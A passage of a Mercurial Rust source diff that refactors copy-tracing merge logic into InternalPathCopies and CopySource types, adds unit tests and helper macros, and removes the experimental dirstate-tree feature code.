- // information. See merge_copies_dict for details.
- match copies.entry(dest) {
- Entry::Vacant(slot) => {
- let ttpc = TimeStampedPathCopy {
- rev: current_rev,
- path: entry,
- };
- slot.insert(ttpc);
- }
- Entry::Occupied(mut slot) => {
- let mut ttpc = slot.get_mut();
- oracle.record_overwrite(ttpc.rev, current_rev);
- ttpc.rev = current_rev;
- ttpc.path = entry;
- }
+ }
+ Action::CopiedFromP2(path_dest, path_source) => {
+ match &mut p2_copies {
+ None => (), // This is not a vertex we should proceed.
+ Some(copies) => add_one_copy(
+ current_rev,
+ path_map,
+ copies,
+ base_p2_copies.as_ref().unwrap(),
+ path_dest,
+ path_source,
+ ),
}
}
Action::Removed(deleted_path) => {
@@ -540,164 +457,131 @@
//
// We need to explicitly record them as dropped to
// propagate this information when merging two
- // TimeStampedPathCopies object.
+ // InternalPathCopies object.
let deleted = path_map.tokenize(deleted_path);
- copies.entry(deleted).and_modify(|old| {
- oracle.record_overwrite(old.rev, current_rev);
- old.rev = current_rev;
- old.path = None;
- });
+
+ let p1_entry = match &mut p1_copies {
+ None => None,
+ Some(copies) => match copies.entry(deleted) {
+ Entry::Occupied(e) => Some(e),
+ Entry::Vacant(_) => None,
+ },
+ };
+ let p2_entry = match &mut p2_copies {
+ None => None,
+ Some(copies) => match copies.entry(deleted) {
+ Entry::Occupied(e) => Some(e),
+ Entry::Vacant(_) => None,
+ },
+ };
+
+ match (p1_entry, p2_entry) {
+ (None, None) => (),
+ (Some(mut e), None) => {
+ e.get_mut().mark_delete(current_rev)
+ }
+ (None, Some(mut e)) => {
+ e.get_mut().mark_delete(current_rev)
+ }
+ (Some(mut e1), Some(mut e2)) => {
+ let cs1 = e1.get_mut();
+ let cs2 = e2.get();
+ if cs1 == cs2 {
+ cs1.mark_delete(current_rev);
+ } else {
+ cs1.mark_delete_with_pair(current_rev, &cs2);
+ }
+ e2.insert(cs1.clone());
+ }
+ }
}
}
}
- copies
+ (p1_copies, p2_copies)
+}
+
+// insert one new copy information in an InternalPathCopies
+//
+// This deal with chaining and overwrite.
+fn add_one_copy(
+ current_rev: Revision,
+ path_map: &mut TwoWayPathMap,
+ copies: &mut InternalPathCopies,
+ base_copies: &InternalPathCopies,
+ path_dest: &HgPath,
+ path_source: &HgPath,
+) {
+ let dest = path_map.tokenize(path_dest);
+ let source = path_map.tokenize(path_source);
+ let entry;
+ if let Some(v) = base_copies.get(&source) {
+ entry = match &v.path {
+ Some(path) => Some((*(path)).to_owned()),
+ None => Some(source.to_owned()),
+ }
+ } else {
+ entry = Some(source.to_owned());
+ }
+ // Each new entry is introduced by the children, we
+ // record this information as we will need it to take
+ // the right decision when merging conflicting copy
+ // information. See merge_copies_dict for details.
+ match copies.entry(dest) {
+ Entry::Vacant(slot) => {
+ let ttpc = CopySource::new(current_rev, entry);
+ slot.insert(ttpc);
+ }
+ Entry::Occupied(mut slot) => {
+ let ttpc = slot.get_mut();
+ ttpc.overwrite(current_rev, entry);
+ }
+ }
}
/// merge two copies-mapping together, minor and major
///
/// In case of conflict, value from "major" will be picked, unless in some
/// cases. See inline documentation for details.
-fn merge_copies_dict<A: Fn(Revision, Revision) -> bool>(
+fn merge_copies_dict(
path_map: &TwoWayPathMap,
current_merge: Revision,
- mut minor: TimeStampedPathCopies,
- mut major: TimeStampedPathCopies,
- changes: &ChangedFiles,
- oracle: &mut AncestorOracle<A>,
-) -> TimeStampedPathCopies {
- // This closure exist as temporary help while multiple developper are
- // actively working on this code. Feel free to re-inline it once this
- // code is more settled.
- let mut cmp_value =
- |dest: &PathToken,
- src_minor: &TimeStampedPathCopy,
- src_major: &TimeStampedPathCopy| {
- compare_value(
- path_map,
- current_merge,
- changes,
- oracle,
- dest,
- src_minor,
- src_major,
- )
- };
- if minor.is_empty() {
- major
- } else if major.is_empty() {
- minor
- } else if minor.len() * 2 < major.len() {
- // Lets says we are merging two TimeStampedPathCopies instance A and B.
- //
- // If A contains N items, the merge result will never contains more
- // than N values differents than the one in A
- //
- // If B contains M items, with M > N, the merge result will always
- // result in a minimum of M - N value differents than the on in
- // A
- //
- // As a result, if N < (M-N), we know that simply iterating over A will
- // yield less difference than iterating over the difference
- // between A and B.
- //
- // This help performance a lot in case were a tiny
- // TimeStampedPathCopies is merged with a much larger one.
- for (dest, src_minor) in minor {
- let src_major = major.get(&dest);
- match src_major {
- None => major.insert(dest, src_minor),
- Some(src_major) => {
- match cmp_value(&dest, &src_minor, src_major) {
- MergePick::Any | MergePick::Major => None,
- MergePick::Minor => major.insert(dest, src_minor),
- }
- }
+ minor: InternalPathCopies,
+ major: InternalPathCopies,
+ get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy,
+) -> InternalPathCopies {
+ use crate::utils::{ordmap_union_with_merge, MergeResult};
+
+ ordmap_union_with_merge(minor, major, |&dest, src_minor, src_major| {
+ let (pick, overwrite) = compare_value(
+ current_merge,
+ || get_merge_case(path_map.untokenize(dest)),
+ src_minor,
+ src_major,
+ );
+ if overwrite {
+ let (winner, loser) = match pick {
+ MergePick::Major | MergePick::Any => (src_major, src_minor),
+ MergePick::Minor => (src_minor, src_major),
};
- }
- major
- } else if major.len() * 2 < minor.len() {
- // This use the same rational than the previous block.
- // (Check previous block documentation for details.)
- for (dest, src_major) in major {
- let src_minor = minor.get(&dest);
- match src_minor {
- None => minor.insert(dest, src_major),
- Some(src_minor) => {
- match cmp_value(&dest, src_minor, &src_major) {
- MergePick::Any | MergePick::Minor => None,
- MergePick::Major => minor.insert(dest, src_major),
- }
+ MergeResult::UseNewValue(CopySource::new_from_merge(
+ current_merge,
+ winner,
+ loser,
+ ))
+ } else {
+ match pick {
+ MergePick::Any | MergePick::Major => {
+ MergeResult::UseRightValue
}
- };
- }
- minor
- } else {
- let mut override_minor = Vec::new();
- let mut override_major = Vec::new();
-
- let mut to_major = |k: &PathToken, v: &TimeStampedPathCopy| {
- override_major.push((k.clone(), v.clone()))
- };
- let mut to_minor = |k: &PathToken, v: &TimeStampedPathCopy| {
- override_minor.push((k.clone(), v.clone()))
- };
-
- // The diff function leverage detection of the identical subpart if
- // minor and major has some common ancestors. This make it very
- // fast is most case.
- //
- // In case where the two map are vastly different in size, the current
- // approach is still slowish because the iteration will iterate over
- // all the "exclusive" content of the larger on. This situation can be
- // frequent when the subgraph of revision we are processing has a lot
- // of roots. Each roots adding they own fully new map to the mix (and
- // likely a small map, if the path from the root to the "main path" is
- // small.
- //
- // We could do better by detecting such situation and processing them
- // differently.
- for d in minor.diff(&major) {
- match d {
- DiffItem::Add(k, v) => to_minor(k, v),
- DiffItem::Remove(k, v) => to_major(k, v),
- DiffItem::Update { old, new } => {
- let (dest, src_major) = new;
- let (_, src_minor) = old;
- match cmp_value(dest, src_minor, src_major) {
- MergePick::Major => to_minor(dest, src_major),
- MergePick::Minor => to_major(dest, src_minor),
- // If the two entry are identical, no need to do
- // anything (but diff should not have yield them)
- MergePick::Any => unreachable!(),
- }
- }
- };
- }
-
- let updates;
- let mut result;
- if override_major.is_empty() {
- result = major
- } else if override_minor.is_empty() {
- result = minor
- } else {
- if override_minor.len() < override_major.len() {
- updates = override_minor;
- result = minor;
- } else {
- updates = override_major;
- result = major;
- }
- for (k, v) in updates {
- result.insert(k, v);
+ MergePick::Minor => MergeResult::UseLeftValue,
}
}
- result
- }
+ })
}
/// represent the side that should prevail when merging two
-/// TimeStampedPathCopies
+/// InternalPathCopies
+#[derive(Debug, PartialEq)]
enum MergePick {
/// The "major" (p1) side prevails
Major,
@@ -709,89 +593,88 @@
/// decide which side prevails in case of conflicting values
#[allow(clippy::if_same_then_else)]
-fn compare_value<A: Fn(Revision, Revision) -> bool>(
- path_map: &TwoWayPathMap,
+fn compare_value(
current_merge: Revision,
- changes: &ChangedFiles,
- oracle: &mut AncestorOracle<A>,
- dest: &PathToken,
- src_minor: &TimeStampedPathCopy,
- src_major: &TimeStampedPathCopy,
-) -> MergePick {
- if src_major.rev == current_merge {
- if src_minor.rev == current_merge {
- if src_major.path.is_none() {
- // We cannot get different copy information for both p1 and p2
- // from the same revision. Unless this was a
- // deletion
- MergePick::Any
- } else {
- unreachable!();
- }
- } else {
- // The last value comes the current merge, this value -will- win
- // eventually.
- oracle.record_overwrite(src_minor.rev, src_major.rev);
- MergePick::Major
- }
+ merge_case_for_dest: impl Fn() -> MergeCase,
+ src_minor: &CopySource,
+ src_major: &CopySource,
+) -> (MergePick, bool) {
+ if src_major == src_minor {
+ (MergePick::Any, false)
+ } else if src_major.rev == current_merge {
+ // minor is different according to per minor == major check earlier
+ debug_assert!(src_minor.rev != current_merge);
+
+ // The last value comes the current merge, this value -will- win
+ // eventually.
+ (MergePick::Major, true)
} else if src_minor.rev == current_merge {
// The last value comes the current merge, this value -will- win
// eventually.
- oracle.record_overwrite(src_major.rev, src_minor.rev);
- MergePick::Minor
+ (MergePick::Minor, true)
} else if src_major.path == src_minor.path {
+ debug_assert!(src_major.rev != src_major.rev);
// we have the same value, but from other source;
- if src_major.rev == src_minor.rev {
- // If the two entry are identical, they are both valid
- MergePick::Any
- } else if oracle.is_overwrite(src_major.rev, src_minor.rev) {
- MergePick::Minor
+ if src_major.is_overwritten_by(src_minor) {
+ (MergePick::Minor, false)
+ } else if src_minor.is_overwritten_by(src_major) {
+ (MergePick::Major, false)
} else {
- MergePick::Major
+ (MergePick::Any, true)
}
- } else if src_major.rev == src_minor.rev {
- // We cannot get copy information for both p1 and p2 in the
- // same rev. So this is the same value.
- unreachable!(
- "conflict information from p1 and p2 in the same revision"
- );
} else {
- let dest_path = path_map.untokenize(*dest);
- let action = changes.get_merge_case(dest_path);
- if src_major.path.is_none() && action == MergeCase::Salvaged {
+ debug_assert!(src_major.rev != src_major.rev);
+ let action = merge_case_for_dest();
+ if src_minor.path.is_some()
+ && src_major.path.is_none()
+ && action == MergeCase::Salvaged
+ {
// If the file is "deleted" in the major side but was
// salvaged by the merge, we keep the minor side alive
- MergePick::Minor
- } else if src_minor.path.is_none() && action == MergeCase::Salvaged {
+ (MergePick::Minor, true)
+ } else if src_major.path.is_some()
+ && src_minor.path.is_none()
+ && action == MergeCase::Salvaged
+ {
// If the file is "deleted" in the minor side but was
// salvaged by the merge, unconditionnaly preserve the
// major side.
- MergePick::Major
- } else if action == MergeCase::Merged {
- // If the file was actively merged, copy information
- // from each side might conflict. The major side will
- // win such conflict.
- MergePick::Major
- } else if oracle.is_overwrite(src_major.rev, src_minor.rev) {
- // If the minor side is strictly newer than the major
- // side, it should be kept.
- MergePick::Minor
- } else if src_major.path.is_some() {
- // without any special case, the "major" value win
- // other the "minor" one.
- MergePick::Major
- } else if oracle.is_overwrite(src_minor.rev, src_major.rev) {
- // the "major" rev is a direct ancestors of "minor",
- // any different value should
- // overwrite
- MergePick::Major
+ (MergePick::Major, true)
+ } else if src_minor.is_overwritten_by(src_major) {
+ // The information from the minor version are strictly older than
+ // the major version
+ if action == MergeCase::Merged {
+ // If the file was actively merged, its means some non-copy
+ // activity happened on the other branch. It
+ // mean the older copy information are still relevant.
+ //
+ // The major side wins such conflict.
+ (MergePick::Major, true)
+ } else {
+ // No activity on the minor branch, pick the newer one.
+ (MergePick::Major, false)
+ }
+ } else if src_major.is_overwritten_by(src_minor) {
+ if action == MergeCase::Merged {
+ // If the file was actively merged, its means some non-copy
+ // activity happened on the other branch. It
+ // mean the older copy information are still relevant.
+ //
+ // The major side wins such conflict.
+ (MergePick::Major, true)
+ } else {
+ // No activity on the minor branch, pick the newer one.
+ (MergePick::Minor, false)
+ }
+ } else if src_minor.path.is_none() {
+ // the minor side has no relevant information, pick the alive one
+ (MergePick::Major, true)
+ } else if src_major.path.is_none() {
+ // the major side has no relevant information, pick the alive one
+ (MergePick::Minor, true)
} else {
- // major version is None (so the file was deleted on
- // that branch) and that branch is independant (neither
- // minor nor major is an ancestors of the other one.)
- // We preserve the new
- // information about the new file.
- MergePick::Minor
+ // by default the major side wins
+ (MergePick::Major, true)
}
}
}
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/hg-core/src/copy_tracing/tests.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,141 @@
+use super::*;
+
+/// Unit tests for:
+///
+/// ```ignore
+/// fn compare_value(
+/// current_merge: Revision,
+/// merge_case_for_dest: impl Fn() -> MergeCase,
+/// src_minor: &CopySource,
+/// src_major: &CopySource,
+/// ) -> (MergePick, /* overwrite: */ bool)
+/// ```
+#[test]
+fn test_compare_value() {
+ // The `compare_value!` macro calls the `compare_value` function with
+ // arguments given in pseudo-syntax:
+ //
+ // * For `merge_case_for_dest` it takes a plain `MergeCase` value instead
+ // of a closure.
+ // * `CopySource` values are represented as `(rev, path, overwritten)`
+ // tuples of type `(Revision, Option<PathToken>, OrdSet<Revision>)`.
+ // * `PathToken` is an integer not read by `compare_value`. It only checks
+ // for `Some(_)` indicating a file copy v.s. `None` for a file deletion.
+ // * `OrdSet<Revision>` is represented as a Python-like set literal.
+
+ use MergeCase::*;
+ use MergePick::*;
+
+ assert_eq!(
+ compare_value!(1, Normal, (1, None, { 1 }), (1, None, { 1 })),
+ (Any, false)
+ );
+}
+
+/// Unit tests for:
+///
+/// ```ignore
+/// fn merge_copies_dict(
+/// path_map: &TwoWayPathMap, // Not visible in test cases
+/// current_merge: Revision,
+/// minor: InternalPathCopies,
+/// major: InternalPathCopies,
+/// get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy,
+/// ) -> InternalPathCopies
+/// ```
+#[test]
+fn test_merge_copies_dict() {
+ // The `merge_copies_dict!` macro calls the `merge_copies_dict` function
+ // with arguments given in pseudo-syntax:
+ //
+ // * `TwoWayPathMap` and path tokenization are implicitly taken care of.
+ // All paths are given as string literals.
+ // * Key-value maps are represented with `{key1 => value1, key2 => value2}`
+ // pseudo-syntax.
+ // * `InternalPathCopies` is a map of copy destination path keys to
+ // `CopySource` values.
+ // - `CopySource` is represented as a `(rev, source_path, overwritten)`
+ // tuple of type `(Revision, Option<Path>, OrdSet<Revision>)`.
+ // - Unlike in `test_compare_value`, source paths are string literals.
+ // - `OrdSet<Revision>` is again represented as a Python-like set
+ // literal.
+ // * `get_merge_case` is represented as a map of copy destination path to
+ // `MergeCase`. The default for paths not in the map is
+ // `MergeCase::Normal`.
+ //
+ // `internal_path_copies!` creates an `InternalPathCopies` value with the
+ // same pseudo-syntax as in `merge_copies_dict!`.
+
+ use MergeCase::*;
+
+ assert_eq!(
+ merge_copies_dict!(
+ 1,
+ {"foo" => (1, None, {})},
+ {},
+ {"foo" => Merged}
+ ),
+ internal_path_copies!("foo" => (1, None, {}))
+ );
+}
+
+/// Unit tests for:
+///
+/// ```ignore
+/// impl CombineChangesetCopies {
+/// fn new(children_count: HashMap<Revision, usize>) -> Self
+///
+/// // Called repeatedly:
+/// fn add_revision_inner<'a>(
+/// &mut self,
+/// rev: Revision,
+/// p1: Revision,
+/// p2: Revision,
+/// copy_actions: impl Iterator<Item = Action<'a>>,
+/// get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy,
+/// )
+///
+/// fn finish(mut self, target_rev: Revision) -> PathCopies
+/// }
+/// ```
+#[test]
+fn test_combine_changeset_copies() {
+ // `combine_changeset_copies!` creates a `CombineChangesetCopies` with
+ // `new`, then calls `add_revision_inner` repeatedly, then calls `finish`
+ // for its return value.
+ //
+ // All paths given as string literals.
+ //
+ // * Key-value maps are represented with `{key1 => value1, key2 => value2}`
+ // pseudo-syntax.
+ // * `children_count` is a map of revision numbers to count of children in
+ // the DAG. It includes all revisions that should be considered by the
+ // algorithm.
+ // * Calls to `add_revision_inner` are represented as an array of anonymous
+ // structs with named fields, one pseudo-struct per call.
+ //
+ // `path_copies!` creates a `PathCopies` value, a map of copy destination
+ // keys to copy source values. Note: the arrows for map literal syntax
+ // point **backwards** compared to the logical direction of copy!
+
+ use crate::NULL_REVISION as NULL;
+ use Action::*;
+ use MergeCase::*;
+
+ assert_eq!(
+ combine_changeset_copies!(
+ { 1 => 1, 2 => 1 },
+ [
+ { rev: 1, p1: NULL, p2: NULL, actions: [], merge_cases: {}, },
+ { rev: 2, p1: NULL, p2: NULL, actions: [], merge_cases: {}, },
+ {
+ rev: 3, p1: 1, p2: 2,
+ actions: [CopiedFromP1("destination.txt", "source.txt")],
+ merge_cases: {"destination.txt" => Merged},
+ },
+ ],
+ 3,
+ ),
+ path_copies!("destination.txt" => "source.txt")
+ );
+}
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/rust/hg-core/src/copy_tracing/tests_support.rs Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,199 @@
+//! Supporting macros for `tests.rs` in the same directory.
+//! See comments there for usage.
+
+/// Python-like set literal
+macro_rules! set {
+ (
+ $Type: ty {
+ $( $value: expr ),* $(,)?
+ }
+ ) => {{
+ #[allow(unused_mut)]
+ let mut set = <$Type>::new();
+ $( set.insert($value); )*
+ set
+ }}
+}
+
+/// `{key => value}` map literal
+macro_rules! map {
+ (
+ $Type: ty {
+ $( $key: expr => $value: expr ),* $(,)?
+ }
+ ) => {{
+ #[allow(unused_mut)]
+ let mut set = <$Type>::new();
+ $( set.insert($key, $value); )*
+ set
+ }}
+}
+
+macro_rules! copy_source {
+ ($rev: expr, $path: expr, $overwritten: tt) => {
+ CopySource {
+ rev: $rev,
+ path: $path,
+ overwritten: set!(OrdSet<Revision> $overwritten),
+ }
+ };
+}
+
+macro_rules! compare_value {
+ (
+ $merge_revision: expr,
+ $merge_case_for_dest: ident,
+ ($min_rev: expr, $min_path: expr, $min_overwrite: tt),
+ ($maj_rev: expr, $maj_path: expr, $maj_overwrite: tt) $(,)?
+ ) => {
+ compare_value(
+ $merge_revision,
+ || $merge_case_for_dest,
+ ©_source!($min_rev, $min_path, $min_overwrite),
+ ©_source!($maj_rev, $maj_path, $maj_overwrite),
+ )
+ };
+}
+
+macro_rules! tokenized_path_copies {
+ (
+ $path_map: ident, {$(
+ $dest: expr => (
+ $src_rev: expr,
+ $src_path: expr,
+ $src_overwrite: tt
+ )
+ ),*}
+ $(,)*
+ ) => {
+ map!(InternalPathCopies {$(
+ $path_map.tokenize(HgPath::new($dest)) =>
+ copy_source!(
+ $src_rev,
+ Option::map($src_path, |p: &str| {
+ $path_map.tokenize(HgPath::new(p))
+ }),
+ $src_overwrite
+ )
+ )*})
+ }
+}
+
+macro_rules! merge_case_callback {
+ (
+ $( $merge_path: expr => $merge_case: ident ),*
+ $(,)?
+ ) => {
+ #[allow(unused)]
+ |merge_path| -> MergeCase {
+ $(
+ if (merge_path == HgPath::new($merge_path)) {
+ return $merge_case
+ }
+ )*
+ MergeCase::Normal
+ }
+ };
+}
+
+macro_rules! merge_copies_dict {
+ (
+ $current_merge: expr,
+ $minor_copies: tt,
+ $major_copies: tt,
+ $get_merge_case: tt $(,)?
+ ) => {
+ {
+ #[allow(unused_mut)]
+ let mut map = TwoWayPathMap::default();
+ let minor = tokenized_path_copies!(map, $minor_copies);
+ let major = tokenized_path_copies!(map, $major_copies);
+ merge_copies_dict(
+ &map, $current_merge, minor, major,
+ merge_case_callback! $get_merge_case,
+ )
+ .into_iter()
+ .map(|(token, source)| {
+ (
+ map.untokenize(token).to_string(),
+ (
+ source.rev,
+ source.path.map(|t| map.untokenize(t).to_string()),
+ source.overwritten.into_iter().collect(),
+ ),
+ )
+ })
+ .collect::<OrdMap<_, _>>()
+ }
+ };
+}
+
+macro_rules! internal_path_copies {
+ (
+ $(
+ $dest: expr => (
+ $src_rev: expr,
+ $src_path: expr,
+ $src_overwrite: tt $(,)?
+ )
+ ),*
+ $(,)*
+ ) => {
+ map!(OrdMap<_, _> {$(
+ String::from($dest) => (
+ $src_rev,
+ $src_path,
+ set!(OrdSet<Revision> $src_overwrite)
+ )
+ ),*})
+ };
+}
+
+macro_rules! combine_changeset_copies {
+ (
+ $children_count: tt,
+ [
+ $(
+ {
+ rev: $rev: expr,
+ p1: $p1: expr,
+ p2: $p2: expr,
+ actions: [
+ $(
+ $Action: ident($( $action_path: expr ),+)
+ ),*
+ $(,)?
+ ],
+ merge_cases: $merge: tt
+ $(,)?
+ }
+ ),*
+ $(,)?
+ ],
+ $target_rev: expr $(,)*
+ ) => {{
+ let count = map!(HashMap<Revision, usize> $children_count);
+ let mut combine_changeset_copies = CombineChangesetCopies::new(count);
+ $(
+ let actions = vec![$(
+ $Action($( HgPath::new($action_path) ),*)
+ ),*];
+ combine_changeset_copies.add_revision_inner(
+ $rev, $p1, $p2, actions.into_iter(),
+ merge_case_callback! $merge
+ );
+ )*
+ combine_changeset_copies.finish($target_rev)
+ }};
+}
+
+macro_rules! path_copies {
+ (
+ $( $expected_destination: expr => $expected_source: expr ),* $(,)?
+ ) => {
+ map!(PathCopies {$(
+ HgPath::new($expected_destination).to_owned()
+ => HgPath::new($expected_source).to_owned(),
+ ),*})
+ };
+}
--- a/rust/hg-core/src/dirstate.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/dirstate.rs Tue Apr 20 11:01:06 2021 -0400
@@ -5,21 +5,23 @@
// This software may be used and distributed according to the terms of the
// GNU General Public License version 2 or any later version.
-use crate::{utils::hg_path::HgPathBuf, DirstateParseError, FastHashMap};
+use crate::errors::HgError;
+use crate::revlog::Node;
+use crate::{utils::hg_path::HgPathBuf, FastHashMap};
+use bytes_cast::{unaligned, BytesCast};
use std::collections::hash_map;
use std::convert::TryFrom;
pub mod dirs_multiset;
pub mod dirstate_map;
-#[cfg(feature = "dirstate-tree")]
-pub mod dirstate_tree;
pub mod parsers;
pub mod status;
-#[derive(Debug, PartialEq, Clone)]
+#[derive(Debug, PartialEq, Clone, BytesCast)]
+#[repr(C)]
pub struct DirstateParents {
- pub p1: [u8; 20],
- pub p2: [u8; 20],
+ pub p1: Node,
+ pub p2: Node,
}
/// The C implementation uses all signed types. This will be an issue
@@ -33,20 +35,24 @@
pub size: i32,
}
+#[derive(BytesCast)]
+#[repr(C)]
+struct RawEntry {
+ state: u8,
+ mode: unaligned::I32Be,
+ size: unaligned::I32Be,
+ mtime: unaligned::I32Be,
+ length: unaligned::I32Be,
+}
+
/// A `DirstateEntry` with a size of `-2` means that it was merged from the
/// other parent. This allows revert to pick the right status back during a
/// merge.
pub const SIZE_FROM_OTHER_PARENT: i32 = -2;
-#[cfg(not(feature = "dirstate-tree"))]
pub type StateMap = FastHashMap<HgPathBuf, DirstateEntry>;
-#[cfg(not(feature = "dirstate-tree"))]
pub type StateMapIter<'a> = hash_map::Iter<'a, HgPathBuf, DirstateEntry>;
-#[cfg(feature = "dirstate-tree")]
-pub type StateMap = dirstate_tree::tree::Tree;
-#[cfg(feature = "dirstate-tree")]
-pub type StateMapIter<'a> = dirstate_tree::iter::Iter<'a>;
pub type CopyMap = FastHashMap<HgPathBuf, HgPathBuf>;
pub type CopyMapIter<'a> = hash_map::Iter<'a, HgPathBuf, HgPathBuf>;
@@ -60,7 +66,7 @@
}
impl TryFrom<u8> for EntryState {
- type Error = DirstateParseError;
+ type Error = HgError;
fn try_from(value: u8) -> Result<Self, Self::Error> {
match value {
@@ -69,8 +75,8 @@
b'r' => Ok(EntryState::Removed),
b'm' => Ok(EntryState::Merged),
b'?' => Ok(EntryState::Unknown),
- _ => Err(DirstateParseError::CorruptedEntry(format!(
- "Incorrect entry state {}",
+ _ => Err(HgError::CorruptedRepository(format!(
+ "Incorrect dirstate entry state {}",
value
))),
}
--- a/rust/hg-core/src/dirstate/dirs_multiset.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/dirstate/dirs_multiset.rs Tue Apr 20 11:01:06 2021 -0400
@@ -30,7 +30,6 @@
/// Initializes the multiset from a dirstate.
///
/// If `skip_state` is provided, skips dirstate entries with equal state.
- #[cfg(not(feature = "dirstate-tree"))]
pub fn from_dirstate(
dirstate: &StateMap,
skip_state: Option<EntryState>,
@@ -51,30 +50,6 @@
Ok(multiset)
}
- /// Initializes the multiset from a dirstate.
- ///
- /// If `skip_state` is provided, skips dirstate entries with equal state.
- #[cfg(feature = "dirstate-tree")]
- pub fn from_dirstate(
- dirstate: &StateMap,
- skip_state: Option<EntryState>,
- ) -> Result<Self, DirstateMapError> {
- let mut multiset = DirsMultiset {
- inner: FastHashMap::default(),
- };
- for (filename, DirstateEntry { state, .. }) in dirstate.iter() {
- // This `if` is optimized out of the loop
- if let Some(skip) = skip_state {
- if skip != state {
- multiset.add_path(filename)?;
- }
- } else {
- multiset.add_path(filename)?;
- }
- }
-
- Ok(multiset)
- }
/// Initializes the multiset from a manifest.
pub fn from_manifest(
--- a/rust/hg-core/src/dirstate/dirstate_map.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/dirstate/dirstate_map.rs Tue Apr 20 11:01:06 2021 -0400
@@ -5,7 +5,8 @@
// This software may be used and distributed according to the terms of the
// GNU General Public License version 2 or any later version.
-use crate::revlog::node::NULL_NODE_ID;
+use crate::errors::HgError;
+use crate::revlog::node::NULL_NODE;
use crate::{
dirstate::{parsers::PARENT_SIZE, EntryState, SIZE_FROM_OTHER_PARENT},
pack_dirstate, parse_dirstate,
@@ -14,7 +15,7 @@
hg_path::{HgPath, HgPathBuf},
},
CopyMap, DirsMultiset, DirstateEntry, DirstateError, DirstateMapError,
- DirstateParents, DirstateParseError, FastHashMap, StateMap,
+ DirstateParents, FastHashMap, StateMap,
};
use micro_timer::timed;
use std::collections::HashSet;
@@ -72,8 +73,8 @@
self.non_normal_set = None;
self.other_parent_set = None;
self.set_parents(&DirstateParents {
- p1: NULL_NODE_ID,
- p2: NULL_NODE_ID,
+ p1: NULL_NODE,
+ p2: NULL_NODE,
})
}
@@ -253,7 +254,6 @@
)
}
- #[cfg(not(feature = "dirstate-tree"))]
pub fn set_non_normal_other_parent_entries(&mut self, force: bool) {
if !force
&& self.non_normal_set.is_some()
@@ -282,34 +282,6 @@
self.non_normal_set = Some(non_normal);
self.other_parent_set = Some(other_parent);
}
- #[cfg(feature = "dirstate-tree")]
- pub fn set_non_normal_other_parent_entries(&mut self, force: bool) {
- if !force
- && self.non_normal_set.is_some()
- && self.other_parent_set.is_some()
- {
- return;
- }
- let mut non_normal = HashSet::new();
- let mut other_parent = HashSet::new();
-
- for (
- filename,
- DirstateEntry {
- state, size, mtime, ..
- },
- ) in self.state_map.iter()
- {
- if state != EntryState::Normal || mtime == MTIME_UNSET {
- non_normal.insert(filename.to_owned());
- }
- if state == EntryState::Normal && size == SIZE_FROM_OTHER_PARENT {
- other_parent.insert(filename.to_owned());
- }
- }
- self.non_normal_set = Some(non_normal);
- self.other_parent_set = Some(other_parent);
- }
/// Both of these setters and their uses appear to be the simplest way to
/// emulate a Python lazy property, but it is ugly and unidiomatic.
@@ -366,11 +338,13 @@
};
} else if file_contents.is_empty() {
parents = DirstateParents {
- p1: NULL_NODE_ID,
- p2: NULL_NODE_ID,
+ p1: NULL_NODE,
+ p2: NULL_NODE,
};
} else {
- return Err(DirstateError::Parse(DirstateParseError::Damaged));
+ return Err(
+ HgError::corrupted("Dirstate appears to be damaged").into()
+ );
}
self.parents = Some(parents);
@@ -383,10 +357,10 @@
}
#[timed]
- pub fn read(
+ pub fn read<'a>(
&mut self,
- file_contents: &[u8],
- ) -> Result<Option<DirstateParents>, DirstateError> {
+ file_contents: &'a [u8],
+ ) -> Result<Option<&'a DirstateParents>, DirstateError> {
if file_contents.is_empty() {
return Ok(None);
}
@@ -423,7 +397,6 @@
self.set_non_normal_other_parent_entries(true);
Ok(packed)
}
- #[cfg(not(feature = "dirstate-tree"))]
pub fn build_file_fold_map(&mut self) -> &FileFoldMap {
if let Some(ref file_fold_map) = self.file_fold_map {
return file_fold_map;
@@ -439,22 +412,6 @@
self.file_fold_map = Some(new_file_fold_map);
self.file_fold_map.as_ref().unwrap()
}
- #[cfg(feature = "dirstate-tree")]
- pub fn build_file_fold_map(&mut self) -> &FileFoldMap {
- if let Some(ref file_fold_map) = self.file_fold_map {
- return file_fold_map;
- }
- let mut new_file_fold_map = FileFoldMap::default();
-
- for (filename, DirstateEntry { state, .. }) in self.state_map.iter() {
- if state != EntryState::Removed {
- new_file_fold_map
- .insert(normalize_case(&filename), filename.to_owned());
- }
- }
- self.file_fold_map = Some(new_file_fold_map);
- self.file_fold_map.as_ref().unwrap()
- }
}
#[cfg(test)]
--- a/rust/hg-core/src/dirstate/dirstate_tree.rs Thu Mar 25 19:06:28 2021 -0400
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,14 +0,0 @@
-// dirstate_tree.rs
-//
-// Copyright 2020, Raphaël Gomès <rgomes@octobus.net>
-//
-// This software may be used and distributed according to the terms of the
-// GNU General Public License version 2 or any later version.
-
-//! Special-case radix tree that matches a filesystem hierarchy for use in the
-//! dirstate.
-//! It has not been optimized at all yet.
-
-pub mod iter;
-pub mod node;
-pub mod tree;
--- a/rust/hg-core/src/dirstate/dirstate_tree/iter.rs Thu Mar 25 19:06:28 2021 -0400
+++ /dev/null Thu Jan 01 00:00:00 1970 +0000
@@ -1,392 +0,0 @@
-// iter.rs
-//
-// Copyright 2020, Raphaël Gomès <rgomes@octobus.net>
-//
-// This software may be used and distributed according to the terms of the
-// GNU General Public License version 2 or any later version.
-
-use super::node::{Node, NodeKind};
-use super::tree::Tree;
-use crate::dirstate::dirstate_tree::node::Directory;
-use crate::dirstate::status::Dispatch;
-use crate::utils::hg_path::{hg_path_to_path_buf, HgPath, HgPathBuf};
-use crate::DirstateEntry;
-use std::borrow::Cow;
-use std::collections::VecDeque;
-use std::iter::{FromIterator, FusedIterator};
-use std::path::PathBuf;
-
-impl FromIterator<(HgPathBuf, DirstateEntry)> for Tree {
- fn from_iter<T: IntoIterator<Item = (HgPathBuf, DirstateEntry)>>(
